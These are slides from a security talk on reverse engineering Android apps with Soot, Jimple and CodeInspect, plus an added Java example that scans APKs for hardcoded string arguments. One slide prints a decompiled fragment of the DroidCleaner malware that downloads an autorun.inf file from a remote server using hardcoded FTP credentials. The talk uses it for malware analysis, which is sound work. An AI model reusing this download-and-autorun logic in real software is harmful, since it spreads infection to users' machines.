Dismantling droids for breakfast - The current state of app reverse engineering Siegfried Rasthofer SECURE SOFTWARE ENGINEERING GROUP
#whoami
• 3rd year PhD student at the Secure Software Engineering Group, Darmstadt, Germany (Prof. Dr. Eric Bodden)
• Research interests:
  • Applied software security on Android
  • Static/dynamic code analyses
• Android security:
  • Found 2 AOSP exploits
  • Security analysis of Backend-as-a-Service
  • Korea threat investigation together with McAfee Research Lab
SECURE SOFTWARE ENGINEERING GROUP
How easy is it to dismantle your app?
How to secure my app against piracy
"I am developing an Android app and I am planning to publish it (paid app). I have heard that it is very easy to pirate Android apps (much easier than iPhone). I was wondering, from your experience or what you know, how can I increase the security of my app? I know that I can never get it 100% secured, but I want to make it harder for people to pirate it or distribute it illegally. Any ideas, experiences, comments you can share? That will be greatly appreciated. Best regards"
Source: stackoverflow.com
Is it still easy to dismantle your app?
A new Binary Analysis Framework for Android and Java Bytecode
Soot
Soot input/output: .dex, .java, .jimple, .class, .apk
Soot provides:
- Various call-graph algorithms
- Sophisticated algorithms used in compiler construction
- Code manipulation
https://github.com/Sable/soot/wiki
Jimple (Soot)
Jimple (Soot): declarations, code and return statement of a decompiled method

public static boolean UsbAutoRunAttack(android.content.Context $param0)
{
    java.lang.String $String;

    $String = <smart.apps.droidcleaner.Tools: java.lang.String urlServer>;
    ...
    staticinvoke <smart.apps.droidcleaner.Tools: boolean DownloadFile(java.lang.String, java.lang.String, java.lang.String, java.lang.String, android.content.Context)>($String, "autorun.inf", "ftpupper", "thisisshit007", $param0);

    return true;
}
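A small Soot-based scan of the kind of Jimple shown above, added here as an example (it is not code from the talk, from Soot or from CodeInspect): it loads an APK, lets Soot convert dex to Jimple, and reports every call to the DroidCleaner Tools.DownloadFile method that receives string constants as arguments, which is how hardcoded FTP credentials like the ones on the slide surface. The APK path and the Android platforms directory are assumed placeholders.

```java
import soot.*;
import soot.jimple.InvokeExpr;
import soot.jimple.Stmt;
import soot.jimple.StringConstant;
import soot.options.Options;

import java.util.Collections;
import java.util.Map;

/** Added example, not part of the talk: report string constants passed to DownloadFile. */
public class HardcodedCredentialScan {

    // Soot's canonical signature string has no spaces after the commas,
    // unlike the CodeInspect rendering on the slide.
    static final String DOWNLOAD_FILE_SIG =
        "<smart.apps.droidcleaner.Tools: boolean DownloadFile(java.lang.String,java.lang.String,"
        + "java.lang.String,java.lang.String,android.content.Context)>";

    public static void main(String[] args) {
        String apk = "/path/to/sample.apk";                   // assumption: APK under analysis
        String platforms = "/path/to/android-sdk/platforms";  // assumption: directory holding android.jar

        Options.v().set_src_prec(Options.src_prec_apk);       // read dex code from the APK
        Options.v().set_android_jars(platforms);
        Options.v().set_process_dir(Collections.singletonList(apk));
        Options.v().set_allow_phantom_refs(true);             // tolerate framework classes we lack
        Options.v().set_output_format(Options.output_format_none);

        // The Jimple transformation pack ("jtp") runs our transformer on every method body.
        PackManager.v().getPack("jtp").add(new Transform("jtp.credscan", new BodyTransformer() {
            @Override
            protected void internalTransform(Body b, String phase, Map<String, String> opts) {
                for (Unit u : b.getUnits()) {
                    Stmt s = (Stmt) u;
                    if (!s.containsInvokeExpr()) continue;
                    InvokeExpr ie = s.getInvokeExpr();
                    if (!DOWNLOAD_FILE_SIG.equals(ie.getMethodRef().getSignature())) continue;
                    // Arguments that are compile-time string constants are values baked into the app.
                    StringBuilder found = new StringBuilder();
                    for (Value arg : ie.getArgs()) {
                        if (arg instanceof StringConstant)
                            found.append(' ').append(((StringConstant) arg).value);
                    }
                    System.out.println(b.getMethod().getSignature() + " passes constants:" + found);
                }
            }
        }));

        Scene.v().loadNecessaryClasses();
        PackManager.v().runPacks();
    }
}
```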
CodeInspect, built on Jimple and Soot
CodeInspect features (recovered from the slide's diagram): syntax highlighting, code refactoring, Java source enhancement, readable Jimple code, code debugger, code manipulation, dataflow visualizer, "region" detection, deobfuscator
Let's get started…
1. Import APK
2. Start Device
Infected >20,000 users
Android/BadAccents (component diagram on the slide): SMS, E-Mail, Install, Tapjacking Activation, Uninstall AV, Fake AV, Attack Component, User, Intercept Call, Intercept SMS, Banking Trojan, Send SMS, HTTP, Native Code, File System, Waiting Time
Live Demo
Future Steps
• New plugins under development
• Easily add your own analyses
How do I get this tool?
Siegfried Rasthofer, Secure Software Engineering Group
Email: siegfried.rasthofer@cased.de
Blog: http://sse-blog.ec-spride.de
Website: http://sse.ec-spride.de
Twitter: @CodeInspect